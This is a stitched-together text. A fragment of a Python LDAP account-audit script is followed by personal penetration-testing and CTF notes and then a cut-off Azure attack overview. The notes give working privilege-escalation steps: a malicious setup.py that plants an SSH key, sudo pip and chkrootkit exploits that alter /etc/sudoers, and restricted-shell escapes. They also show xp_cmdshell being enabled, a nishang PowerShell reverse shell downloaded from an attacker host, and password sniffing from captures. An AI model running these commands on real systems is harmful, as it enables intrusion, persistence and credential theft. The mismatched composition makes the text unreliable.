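    """gid -> group name for groups that confer root, from /etc/group lines."""
    out: Dict[int, str] = {}
    for line in group_file.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[0] in names:
            out[int(parts[2])] = parts[0]
    return out

def audit_ldap_accounts(ldif: str, group_file: str) -> List[str]:
    priv = privileged_gids(group_file)
    findings: List[str] = []
    for e in parse_ldif(ldif):
        uid = e.get("uid", ["?"])[0]
        for gid in e.get("gidNumber", []):
            if int(gid) in priv:
                findings.append(f"{uid}: gidNumber {gid} is group '{priv[int(gid)]}'")
        for home in e.get("homeDirectory", []):
            if home in ("/", "/root"):
                findings.append(f"{uid}: homeDirectory is {home}")
        if "sshPublicKey" in e:
            findings.append(f"{uid}: has {len(e['sshPublicKey'])} sshPublicKey value(s)")
    return findings

# Constructed samples; gid 55 being 'admin' is an assumption of this example.
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:alice\nusers:x:100:\nadmin:x:55:\n"
SAMPLE_LDIF = """\
dn: uid=alice,ou=users,dc=example,dc=local
uid: alice
gidNumber: 100
homeDirectory: /home/alice

dn: uid=bhanu,ou=users,dc=example,dc=local
uid: bhanu
gidNumber: 55
homeDirectory: /root
objectClass: ldapPublicKey
sshPublicKey: ssh-rsa AAAAB3Nza
 C1yc2E-constructed-key-fragment
"""

if __name__ == "__main__":
    for finding in audit_ldap_accounts(SAMPLE_LDIF, SAMPLE_GROUP):
        print(finding)
```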
Priv Esc when Pypi Server is running

Get the steps from here

mkdir shit
cd shit
touch setup.py setup.cfg README.md
mkdir shit
cd shit
nano __init__.py

def hello_word(): print("hello world")

nano ../setup.py

from setuptools import setup

try:
    print('Yo, let me save my ssh key on your machine, so that I can login')
    with open('/home/low/.ssh/authorized_keys', 'w+') as f:
        f.writelines('ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCfz8MF+Oae5...')   # rest of the key line was cut off in the notes
except:
    setup(
        name='Shit_Program',
        packages=['shit'],
        description='Hello world enterprise edition',
        version='0.1',
        url='http://pypi.sneakycorp.htb/shit',
        author='shit',
        author_email='shit@bhanu.notes',
        keywords=['pip','shit','example'])


nano ../setup.cfg
[metadata]
description-file = README.md


cd ..
python3 setup.py sdist
cd dist
export HOME=/tmp/shit
cd ..
nano .pypirc
[distutils]
index-servers =
    pypi
    shit
[pypi]
username:
password:
[shit]
repository: http://127.0.0.1:5000
username: pypi
password: password

python3 setup.py sdist upload -r shit
Output:
running upload
Submitting dist/Shit_Program-0.1.tar.gz to http://127.0.0.1:5000
Server response (200): OK


cat /home/low/.ssh/authorized_keys #our ssh key
Priv Esc When Pip is running with no Passwd

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip3 install $TF

Priv Esc for chkrootkit

cat /etc/crontab                 //chkrootkit is running from cron
dpkg -l chkrootkit               //chkrootkit 0.49-4ubuntu1
searchsploit -m exploits/linux/local/33899.txt
cd /tmp
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update
sudo su                          //After the crontab time, run this and get root :)
PrivEsc When Dbus is Running

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /home/root.txt true

resource

Escaping Limited Shell via SSH

ssh bhanu@10.10.10.10 -t "/bin/bash"      --> Escaping a limited shell using ssh

Running Applications using SSH

ssh 10.10.14.37@10.10.10.119 "/usr/sbin/tcpdump -i ens33 -U -s0 -w - 'not port 22'" > network.cap

-s0 = capture everything; -w - = write the data to stdout; 'not port 22' = do not capture port 22 traffic

wireshark -k network.cap               //-k = start the capture/view immediately.

ssh 10.10.14.37@10.10.10.119 "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -
//View live traffic

cmd /c dir \users\administrator     --> to execute in a web shell
formurl = -o uploads/revshell.php //10.10.14.3/revshell.php
           --> uploading a reverse shell from BurpSuite;
               -o Destination Source
run the shell using IP/uploads/revshell.php and start a meterpreter
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
          --> all files and dirs with root access (SUID root)
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh
                  --> get a proper shell from a restricted shell

Try all the commands from this link one by one to get a complete shell
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
mysql -u root -p               // logging in as root in mysql

\! ls -l                       //Execute commands
Connecting to SQL Server:

sqsh -S 10.10.10.59 -U username -P password

xp_cmdshell 'whoami'            //execute commands

//If xp_cmdshell is not turned on --> follow this (advanced options must be enabled and applied first)

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
xp_cmdshell 'whoami'
go

Getting a Reverse Shell
cp nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1

Add this line at the end of the file & save it
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 9001

python -m SimpleHTTPServer 8001

nc -nvlp 9001

xp_cmdshell "powershell IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/nishang.ps1')"

we get a shell on the netcat connection

Finding Passwords from a PCAP file using TCPDUMP:
tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='


Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...